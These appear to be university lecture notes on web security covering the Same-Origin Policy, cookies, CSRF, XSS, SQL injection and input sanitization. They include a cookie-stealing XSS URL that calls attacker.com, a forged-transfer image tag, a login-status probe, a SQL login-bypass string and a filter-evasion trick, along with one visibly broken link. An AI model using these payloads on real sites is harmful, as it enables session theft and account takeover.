An overview of Web Security principles

This class aims at a gentle introduction to key principles in Web Security, involving Browser security, server-side security, known problems and attacks to be cautious with while designing Web apps, known defenses and eventually the notion of Privacy from the user’s perspective.

Ethical behavior and Law

Compared to buffer overflow exploitation discussed and experimented in previous lectures, the vulnerabilities we cover in this class are still everywhere on the Web and are exploitable. If you experiment with Security problems in the real world, first of all:

You are responsible of your own actions.
You can always come discuss with me if you have any doubt or questions.
Never cause harm.

Belgium has legalized ethical hacking since February 15, 2023, and any ethical hacker must follow CCB’s guideline. Any Belgian may now investigate cybersecurity problems without consent from the product owner, but what differs a criminal from a whitehat is the following rules:

Never cause harm or (try to) obtain illegitimate benefits.
Must report vulnerability as soon as possible to the CCB (Centre for CyberSecurity Belgium). You must also report any finding to the product owner.
Be proportionate and limit yourself to what is necessary to demonstrate the issue.
Do not disclose to a broader public without consent of the CCB.

Be careful that there are timings to follow; and you’ll be protected only if you carefully follow the CCB rules. Some of them might still lead to a restrictive process to follow. You must be completely aware of the process before fudging with anything online without explicit consent. More information may be found on the CCB website.

The (tangled) Web

The Web is a soup of various technologies linked together by backward-compatible standardized protocols that leaves little space for security by-design. The Web Security is an example of what we could call best-effort security, where security was not part of the initial design considerations, and was then added as an after-thought while trying at the same time to not break features that caused the security problems.

The web has known a complex evolution since the end of the 80ies. Originally, it was a static page design with links, and a few commands that were available to retrieve/modify or add data to servers. Then, the protocols and usage gained in complexity, notably with the introduction of Javascript. Is that a problem? Well, our browser now follows instructions sent by the attacker. Do you trust the sites that you visit? No? Yet your computer executes the javascript that it sends and follow the links provided by the attacker and that you might click onto. The situation is even worse. A malicious site may make your machine do the following:

Spawn process
Open sockets to another remote peer
Download content from other third-parties
Run media
Run code on your GPU
Interact with your filesystem

All these operations that can also happen without you even noticing it. Michal Zalewski from his book “Tangled Web” on Web security says the following:

Modern Web applications are built on a tangle of technologies that have been developed over time and then haphazardly pieced together. Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to confidentialy navigate this landscape.

Indeed, as in many areas in computer security, what matters the most for a security expert is to understand with deep details the underlying system, and understand its limitations. It is through abuses of the system’s limitations that security problems find their way. So to understand the main problems with Web Security, we first need to review a few of the core Web concepts.

URLs

URL stands for Uniform Resource Locator, it says how and where to locate some content. The how part refers to the protocol to use. URLs on the web usually have either http or https as the protocol identifier. But one can have URLs using other protocols than these too. You may have already seen git+ssh:// to establish that the git protocol is used through a ssh channel. ftp:// as well was a known and highly used protocol years ago. However, it is being phased out and file transfer is now mostly performed through http as well.

We have three mandatory parts in the URL:

https://www.example.com/index.html

protocol: https
location: www.example.com
the path: /index.html

On the web the location uses domains and is handled by the DNS protocol to convert the human-readable location to a Internet location (an IP). The path is to localisation of the content on the Webserver, where / refers to the root of the server’s filesystem.

The URL can be more complex, but always involves these three components. For example, we may have:

https://www.example.com:8443/path/to/file.html?user=Bob#s5

that involves an explicit port (8443), otherwise 443 is default with https. The URL contains also a query that is part of the HTTP protocol, and an anchor (#s5) that tells the browser to jump to a particular tag of the page. While the query is sent to the remote server, the anchor is a local information to tell the browser where to jump.

A web page may also contain relative and absolute URLs in regards to the main URL that was fetched.

<a href='/path/to/otherfile.html'> otherfile </a>

An advantage of writing your website with relative URL is that your content is not bound to your domain name. This would work on localhost or on your public domain without requiring a different configuration.

HTML / Javascript / CSS

A web page may contain different types of elements that may also interact. HTML (Hypertext Markup Language) is not a programming language, but a specific way to structure the Web page and support basic interactions with the users. For example:

Any webpage may embed links to other elements of its own web content, or to arbitrary content on the Web.
```

<a href="https://facebook.com"> Click here </a> 
```

Embed a picture in the webpage:

<img src="https://example.com/picture.png" />

You may as well attach javascript to images. For example:

<img src="https://example.com/picture.png" onError="doThis()"/>

Include javascript in a page:
```

<script src="path/to/script.js"> </script>


<script>
  let cookie = document.cookie;
</script>
```
The main goal of javascript is to defer part of the work to the client; for example computation on data. The server does not have to do the computation, and instead sends the data alongside the instructions (the javascript). Also, javascript is useful to make pages that change client-side, that are Dynamic. Javascript can read, process, and creates any part of the DOM (Document Object Model), send HTTP queries, retrieve/change the browser’s local state and interact with the user through prompts.

Include CSS in a page:

 <div>
    ...
 </div>
  <!-- We can hide content in various ways, e.g: -->
  div {
    display: none;
  }

  <!-- Or this: -->

  div {
    width: 0px;
    height: 0px;
    overflow: hidden;
  }

Webpage inclusion into a webpage:
```
 <iframe src="https://another.website"></iframe>
```
which of course would cause severe security risk if the embedded webpage was able to navigate/change its surrounding one.

HTTP

HTTP is the underlying Web protocol linking client-side to server-side through URLs. Today, three versions of HTTP are actively used: HTTP/1.1 (RFC 2616), HTTP/2 (RFC 9113) and HTTP/3 (RFC 9114). There are many differences mostly involving performance considerations. For this class, we won’t discuss and covers the specificities of each version.

HTTP can be abstracted as a fairly simple stateless request-response protocol: clients (browsers, CLI such as curl) start a connection towards a HTTP server that is listening to HTTP queries, and can request content, or remotely change content to the server (upon permission). For all requests that are made, the server generates and sends a response including a series of headers, a response code, and the body of the requested content if any.

For example, if we request some content, we can send a HTTP /GET request. It may look like this:

Request URL: https://example.com
Request Method: GET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Referrer Policy: strict-origin-when-cross-origin

In practice all this information needs to be encoded in a certain way within an HTTP Request header and sent to the server. The RFC explains how to encode it (you don’t need to understand these details; only that they exist). What is put into the request headers is fully under the control of the client. The client can put many key/value pair that can potentially be ignored by the server.

The response header may look like this:

HTTP/1.1 200 OK
content-encoding: gzip
content-length: 648
content-type: text/html

There are several HTTP Request type: GET, POST, HEAD, OPTIONS, PUT, DELETE, TRACE, CONNECT are the most known HTTP Methods, although some of them are usually not supported. Extensions (new Request types) may exist with specific applications controlling client/server implementations and requiring other features.

GET and POST are however the most used methods. We focus on them:

GET: It is mainly used for information retrieval, and should not carry a payload sent by the client. A GET request should not be used to change the server’s state, or to communicate security parameters to the server.

POST: It is mainly used to submit information to the server, change its state, or communicate security parameters. A POST request is like a GET request, but with a body attached next to the request header. POST requests may also be used to retrieve content at the same time.

We’re considering the situation where users may visit malicious websites that want to abuse users’ information over other websites. For example, eve.com when loaded in the browser would like to know things about the users’ email on gmail. Since the client runs javascript, eve.com could send a script that loads and hides gmail within its own website, and then explore/retrieve anything that is within the users’ emails.

eve.com could also use a script to try to connect to the users’ social media accounts and spread some dangerous content. Essentially, eve.com generally wants to access the users’ data or environment over any other website, and we need the browser to be able to deal with these issues.

But how to differentiate a malicious access from eve.com to a third-party from a legitimate access to a third-party? We can’t. Either we allow websites to transparently interacts (and it would be extremely unsafe for everyone), or we explicitly disallow it (with a few exceptions, heh!) to draw a line, but at the cost of a significant reduction of web capabilities.

To deal with all the problem that may arise from so much flexibility in how the web interacts with the various source and content, browsers have devised to apply a concept called Same-Origin Policy (SOP). This concepts solely thwart most of the issues with the current Web threat model in where visiting services are threats to other services and to the user itself across services.

Same Origin Policy

The Same Origin Policy is an architectural choice decided and imposed by all browser vendors on Web pages. It is a bit similar in the core principle from Rust ownership’s model that we discussed in class 03. In a sense, the Same Origin Policy imposes limitations on what a Web developer can do. These limitations are carefully designed to prevent the obvious security problems while not impacting too much what a legitimate and honest web developer can and cannot do.

The Same Origin Policy introduces the notion of Origin of a Web page, and Web elements. The origin is the location of the provided Web element, and interacting elements in a Web page must have the same origin (otherwise they simply can’t interact).

The origin is parsed/learn from the URL to which the Web element was fetch from. It comprises of the three elements: protocol, domain and port. E.g.,:

https://example.com

has the origin protocol=https, domain = example.com, port = 443. The following URL has the same origin:

https://example.com/get/content

This one is a different origin:

https://www.example.com/get/content

This is due to the usage of the www subdomain, even though both domains may be under the control of the same person. You may read more details on the Origin determination rules here.

Each resource of a page is labelled to an origin, and as the same indicates, only the same origin resource may interact. There are however a few exceptions:

The browser knows what page and javascript code has been pulled from a given origin, and attaches the origin of the page to the code its context. So, for example, the following javascript code within the html page of https://unamur.be :

<script src="https://static.addtoany.com/menu/modules/core.gfvbdf8m.js" type="module"></script>

has the origin of https://unamur.be. If the script is malicious, it can essentially do anything it wants alongside the context of unamur.be. It is a bit like including a third-party crate in your Rust program. If your third-party crate in untrustworthy, your program may become malicious or exploitable due to some vulnerability into the dependency. In the case of Rust, there’s the tool cargo audit designed to audit dependencies. There exist similar tools in the context of the Web to audit third-party scripts that are usually included as a library. It is however less simple, essentially because dependencies in the Web are unstructured.

Note that the inclusion of third-party content may also create fundamental privacy issues for the user. Let’s reverse roles and now assume the user, Alice, is loading https://unamur.be which can include any script to make a request to a third-party site. The hidden and adversarial goal of unamur.be would be to learn some information about Alice, for example, is Alice currently logged to ChatGPT? Maybe Alice does not want her University to know this information, and she has all the right to hide it. The problem is: while https://unamur.be cannot access any content that would be retrieved from a different Origin (chatGPT.com in this case), https://unamur.be can still learn some information from side-channels; e.g., status code, or request timings. Assume a sysadmin behind https://unamur.be has found a way to make any logged user trigger an error on chatGPT.com. The page result could be as follows:

which technically could not be visible by https://unamur.be, however its status is! This page could very much return an HTTP error code, if say, a user is logged, and no error code otherwise. If such a page exists, it means we have found a distinguisher on chatGPT’s website that can be exploited in few lines included by any other origin, in this example, from https://unamur.be:

<script type="text/javascript"
 src="https://chatgpt.com/path_to_my_distinguisher"
 onload="not_logged_in_to_chatgpt()"
 onerror="logged_in_to_chatgpt()"
 defer>
 </script>

That is, depending on the status code of the request made to the chatGPT url, the onload or onerror event triggers, and we learn what we wanted. We could report the problem to chatGPT; but using the status code is not the only way to figure out whether Alice is connected or not, and eventually the only sound solution to prevent acquiring knowledge from such a method with guarantees is … to prevent cross-origin scripts, which would break the entire web since most websites use cross-origin scripts. So here we have a prime example of the tension existing between privacy and security requirements and usability of a given technology.

So in summary, Webpages from a given origin can make links to other webpages or make a form directed to another origin. Javascript may click the link for the user or submit the form, although what javascript can do depends on its origin.

These rules impose some limitations but are also open enough to support multiple features cross-sites, and because of them, potential vulnerabilities to be cautious with. Regarding limitations, Ajax requests (XMLHttpRequest()) cannot reach another origin than the one they’re attached to. If that was the case, unamur.be could read your emails, send data to your social media accounts, and whatever else without any user interaction, which would be terrifying. SOP thus express enough flexibility to open many usecases while trying to provide some level of isolation and permission between interacting web contents.

Img tags `<img src="..." />`

Images have the origin from the URL they come from. If one includes <img src="https://othersite.com/img.png"/> on https://unamur.be, then the page with origin https://unamur.be would not be able (i.e., its code) to access details of img.png, or even retrieve it and send it to the server.

However, again, we can get side-channel informations, for example the impact the image has on the DOM’s size, which could help learn its size. This as well, can be helpful to guess whether or not a user is connected to another website. These kind of privacy leaks were reported around 15 years ago, and there is [no solution](https://bugzilla.mozilla.org/show_bug.cgi?id=6su290defer

Iframes tags `<iframe src="..."></iframe>`

Iframes, like images, have the origin from the URL they come from. So they can come from anywhere and embeds into eve.com’s website. But the iframe and eve.com cannot interact (e.g., eve.com cannot use javascript to interact with the iframe content).

Despite the Same-Origin policy in web browsers, there are still potential attacks that web developers must be aware of. But before diving into them, we need an overview of Browser and HTTP cookies.

Cookies

We said HTTP was a stateless protocol; but we need browsers to sometimes remember some information that the server sends us. Cookies are designed for this. They help the server set a state in the visitor’s browser to facilitate further interactions. Shopping carts on e-commerce across pages? Cookies. Tracking your behavior for advertisement? Cookies. Supporting authorization for certain page without requiring the user to input their credential each time? Cookies.

The way websites can tell the browser to set a cookie is through the HTTP header response. For example:

Set-Cookie: key=value

creates a key/value pair linked to the Origin from which the header was sent. Each time a browser then sends an HTTP request (GET, POST, etc), it automatically attaches any cookie linked to the Origin, into the HTTP request header.

Cookies can be secret value too. Typically the case for pages protected by authentication. Upon successful authentication, a server would send back in its response header:

Set-Cookie: session=SESSIONID

SESSIONID is expected to be a unique, hard to guess value that is valid for the current session (see Class 04 to produce values that are hard to guess). That is, it changes at each authentication. Such cookie must of course only be sent to the correct origin, and through a secure channel (HTTPS).

Cross-Site Request Forgery (CSRF)

Sadly, the exceptions in the Same Origin Policy and the way Cookies work can allow malicious websites such as eve.com to potentially do terrible things. We need several conditions and bad practices for them to happen. For example, eve.com could have in its webpage the following:

<img src="https://belgiumbank.be/transfer?amount=42&to=eve/>

The brower upon seeing the img tag would try to resolve it and would fetch the indicated link, setting the GET request header with the indicated parameters. The browser would set and send alongside any Cookie linked to belgiumbank.be. So if you happen to be connected to belgiumbank, your session cookie would be sent, and may the transfer would then succeed.

Of course, this is bad practice from the bank. We said that a GET method should not be used to modify the server’s state. But would it have changed anything if the transfer’s server interface was only accessible from a POST request? Of course not, the only different would be that eve.com has to embed a form, and hide it on the webpage, and then automatically click it using javascript. It is a bit more work, but should be considered trivial.

So what can we do?

Good Practice: CSRF tokens

The fundamental problem is that belgiumbank.be cannot differentiate whether a request is made from its own page, or from any other client knowing how to reach belgiumbank.be. And belgiumbank.be’s API (e.g., the transfer API) should be considered public knowledge. The security of the bank should not depend from whether or not we know their endpoints. This is a classical beginner mistake in Web design: hiding/obfuscating the API.

The right approach is to exploit browsers’ Same-Origin Policy to make sure any request we receive on a given URL is only possible because we generated ourself the URL for a given legitimate client. eve.com is not a legitimate client, it tries to look like one in the victim’s context.

How can we generate unique URLs? We can add a parameter to the API, and this parameter should be unique and fresh each time a given SESSIONID receives a webpage. The belgiumbank.be would remember in database each token generated for a given SESSIONID, and for a given endpoint requested. Eventually, when belgiumbank receives a request, the request contains the CSRF token e.g.,

POST /transfer
amount=42
sessionid=...
token=ayuzejklqhsfdsqfa232j12121KDSSkkj812S

We can generate the token using a PRG, store it within the database associated to a given user that made the initial page request and eventually compare the token we receive to the stored token within the database. It is also possible to cryptographically generate it from a user-dependent secret attached to the origin but not within cookies and from a server-side key. The main advantage would be that it becomes unnecessary to store the token since it can be deterministically re-generated from the secrets, but it may make the implementation more complex due to added cryptography generation and verification algorithms. From the basic cryptography we covered in class 04 (e.g., a cryptographic hash function), you should be able to devise such generation and verification algorithms using a cryptography primitive.

Note that these tokens are usually designed to be limited and timeout (or one could fill the server’s memory) in the case they’re stored. This may sometimes show to be more subtle to get right than the cryptographic approach. No matter the approach, the requirement for a token is to be hard to guess, and unique for each endpoint requested, each time they’re requested with a given sessionid. As we discussed in the cryptography class, it means that the token must appears selected at random (uniformly) from a large space.

The security assumption behind this design is that eve.com has no way to steal a user’s CSRF token and set it as part of its request. This is true as long as the browser’s SOP isolation works.

We said Ajax requests could not cross origins. However a domain aa.com can tell the browser that XMLHttpRequest() can be sent from a domain bb.com, allowing cross-origin requests from bb.com.

aa.com can give this information to the browser using the HTTP header, setting Access-Control-Allow-Origin: bb.com. You’ll find more details on Mozilla’s website.

Code Injection attacks (Server-side security)

Cross-site Scripting (XSS) attacks

Assume that we’re visiting a honest website. The attacker could be a client using the website and wanting to access another client’s secrets such as their Session cookie. If the website supports to take clients input and then display it on the website, it needs to be careful not to include any javascript code sent by a malicious client. Such javascript would run within the origin of the honest website and could access any context of that website into the victim’s browser, including their session cookie for example.

Imagine the following page index.php on honest.com sending the following HTTP response to the GET request GET /index.php&name=Bob:

...

<p>Welcome back <?php echo $_GET['name']; ?> </p>

...

This code is vulnerable to a reflected XSS, where someone injects a script into the GET parameter and give it to run to someone else. Note that, URLs sent over the Internet can only contain the ASCII character-set, so any character not part of this set (e.g., a / or a <) has to be encoded as a set of ASCII characters. We use % followed by two hexadecimal digits to encode them. %20 is the space character, %2F is the / character. Look at the following URL exploiting the above vulnerable php code:

https://honest.com/index.php?name=Bob%3Cscript%3E%0A(new%20Image()).src%20%3D%20%22http%3A%2F%2Fattacker.com%2F%3Fx%3D%20%2B%20encodeURIComponent(document.cookie)%3B%0A%3C%2Fscript%3E

This request would give the following page to anyone clicking the link:

...
<p> Welcome back Bob<script>
(new Image()).src = "http://attacker.com/?x= +
encodeURIComponent(document.cookie);
</script></p>
...

Check the mapping between %+2digits with the displayed character.

Sending the victim’s cookie to attacker.com, using SOP’s exception on image integration. This is a form of code injection vulnerability. The same kind of XSS attacks can also be called ‘Stored’ rather than reflective. It is stored when the malicious input is essentially stored on the Website’s db, and then served to other clients upon demands. Forums were usually the main example of such stored XSS attacks. I.e., assume there exists a place where you can write a message that would then be displayed to other people. If the server lets you input javascript and does not check for it, then it could be executed to anyone visiting your post.

Remember: these problems are real and plague the Web. Never cause harm; never take advantage of them in the real world, even just for fun.

SQL Injections

Server-side usually use SQL databases to store and retrieve content efficiently. SQL is a domain-specific language (DSL) that requires careful handling of any input provided by the client, which is untrusted as part of the Web’s threat model.

SQL code and interactions with the database usually follows from a HTTP request sent by the client. The HTTP request may contain parameters used in the SQL query. Let’s have an example with an authentication form.

A user would fill a form and click the submit button to authenticate, which triggers the browser to send a HTTP POST request

POST /auth HTTP/1.1 email=bob@bobemail.com password=“BobPa$$word”

Service side, the database may have a user table which looks like the following:

Email	hashed_pwd
bob@bobemail.com	AKjd54zsd…1azezer
alice@skynet.com	skdsqj46aa..Z5554aa

The server may start to hash the provided password, and then issue the following query:

SELECT 1 FROM users WHERE email = '{email}' AND hashed_pwd = '{hpwd}' LIMIT
1;

This is vulnerable to a SQL injection where the user could input in the authentication form’s email the value (pay attention to the quote):

alice@skynet.com' OR '1' ='1

which would result in the following SQL query:

SELECT 1 FROM users WHERE email = 'alice@skynet.com' OR '1' = '1' AND hashed_pwd =
'{hpwd}' LIMIT 1;

This query would always return a user from the user table because the OR clause is always evaluated at true when the provided email exists in the database, allowing the attacker to potentially authenticate to any account. Note that this is an injection example among many possibilities that essentially depends on the type of SQL query being written by the server.

Sanitizing inputs

Any input received from a client is untrusted. The server must always sanitized the inputs. Sanitizing inputs is not trivial. For example, if the server is parsing inputs to check for a <script> tag, the user could adapt the XSS attack example as follows:

<scr<script>ipt> ... </sc</script>ript>

which could result in <script> ... </script>.

Regarding SQL statements, the problem is generally well handled using parametrized queries from existing web frameworks (also called prepared statements). You should not try to attempt it yourself, but rather find the existing tooling to escape quotes, evaluate that the input matches the expected type (e.g., an email address, or a date). You’ll find more examples on the reading materials for this class.

Note that regarding SQL injections, using parametrized queries is the right way to go. The idea of that approach is to make SQL compiles the query (prepare it) before receiving the user input, such that the user input cannot modify the query. Every serious SQL library supports parametrized query.

INFOB301: Computer Security